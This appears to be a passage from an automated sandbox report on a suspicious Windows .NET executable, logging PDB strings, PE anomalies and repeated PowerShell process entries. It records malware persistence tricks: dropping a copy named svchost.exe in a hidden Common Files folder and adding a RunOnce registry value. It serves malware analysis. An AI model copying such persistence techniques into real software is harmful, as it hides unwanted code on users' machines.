            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Directory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Directory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
            Source: qINcOlwRud.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: qINcOlwRud.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Core.ni.pdbRSDSD source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Xml.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: Accessibility.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: np6pVisualBasic.pdb43 source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Drawing.pdb`] source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: np6pVisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Configuration.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: .pdb% source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmp
            Source: Binary string: System.Xml.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Core.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: (P+pLC:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Users\user\Desktop\qINcOlwRud.PDB( source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: mscorlib.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Windows.Forms.pdb0 source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Drawing.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: mscorlib.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Core.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Xml.pdbD source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: qINcOlwRud.exe | Static PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
            Source: svchost.exe.0.dr | Static PE information: real checksum: 0x9c7d should be: 0xbd49
            Source: qINcOlwRud.exe | Static PE information: real checksum: 0x9c7d should be: 0xbd49
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Code function: 0_2_01176368 push eax; retf

            Persistence and Installation Behavior:

            Drops PE files with benign system names
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | File created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce KGpXzAMpWDmcnfKnkZdJaBfAImY
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
